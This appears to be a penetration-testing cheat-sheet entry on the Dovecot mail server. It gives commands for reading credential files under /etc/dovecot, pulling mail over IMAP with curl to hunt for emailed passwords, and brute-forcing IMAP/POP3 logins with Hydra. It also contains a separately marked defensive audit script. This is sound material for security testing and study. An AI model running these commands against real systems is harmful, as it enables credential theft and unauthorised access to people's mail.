Dovecot

What it is: Open-source IMAP/POP3 mail server for Linux. Usually found alongside Postfix or Exim. Config files often contain plaintext credentials. Rarely directly exploitable but a great source of credentials.

Default ports: 110 (POP3), 143 (IMAP), 993 (IMAPS), 995 (POP3S)

Vuln research:


Read Dovecot config for creds

Configuration files may contain plaintext passwords

cat /etc/dovecot/dovecot-users
cat /etc/dovecot/conf.d/10-auth.conf
cat /etc/dovecot/conf.d/auth-passwdfile.conf.ext
# Look for passdb and userdb entries
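
Defender-side check for the same files, as an added example that is not part of the original page: a shell function that audits a Dovecot passwd-file for plaintext or weakly hashed entries and for a world-readable file mode. The function names, finding labels, weak-scheme list and sample entries are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit a Dovecot passwd-file.
# Assumed line format: user:password:uid:gid:gecos:home:shell:extra
# Reports usernames and schemes only; the password value is never printed.

audit_passwd_file() {
    file=$1
    [ -r "$file" ] || { echo "ERROR cannot read $file"; return 2; }

    # Finding: file mode lets "other" users read it (last octal digit has r bit).
    mode=$(stat -c '%a' "$file" 2>/dev/null || stat -f '%Lp' "$file")
    case $mode in
        *[4567]) echo "PERMS mode=$mode world-readable" ;;
    esac

    awk -F: '
        /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
        {
            user = $1; pw = $2; scheme = ""
            if (match(pw, /^[{][^}]+[}]/)) {     # leading {SCHEME} or {SCHEME.enc}
                scheme = toupper(substr(pw, 2, RLENGTH - 2))
                sub(/\.(B64|BASE64|HEX)$/, "", scheme)
            }
            if (scheme == "PLAIN" || scheme == "CLEAR" || scheme == "CLEARTEXT")
                print "PLAINTEXT " user " scheme=" scheme
            else if (scheme ~ /^(PLAIN-MD5|LDAP-MD5|SHA|SMD5|SSHA)$/)
                print "WEAKHASH " user " scheme=" scheme   # non-exhaustive list
            else if (scheme == "" && pw != "" && pw !~ /^[$!*]/)
                print "UNPREFIXED " user " check-default-scheme"
        }
    ' "$file"
}

# Constructed sample data, for demonstration only.
demo_audit() {
    sample=$(mktemp)
    cat > "$sample" <<'EOF'
# constructed entries
alice:{PLAIN}example-pw:1000:1000::/home/alice
bob:{SHA512-CRYPT}$6$examplesalt$examplehash:1001:1001::/home/bob
carol:example-pw:1002:1002::/home/carol
EOF
    chmod 644 "$sample"
    audit_passwd_file "$sample"
    rm -f "$sample"
}
demo_audit
```

An UNPREFIXED finding means the entry is interpreted with the passdb's default scheme, so check what that scheme is set to before treating it as plaintext.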

Read mail for credentials

If you can access a mailbox, read it: users often email passwords.

# Via IMAP:
curl -k imaps://$IP -u user:password
# List mailboxes:
curl -k "imaps://$IP" -u user:password -X "LIST \"\" *"
# Read inbox:
curl -k "imaps://$IP/INBOX" -u user:password -X "FETCH 1:* BODY[TEXT]"

Brute force mail credentials

Hydra against IMAP/POP3

hydra -l user -P wordlist.txt $IP imap
hydra -l user -P wordlist.txt $IP pop3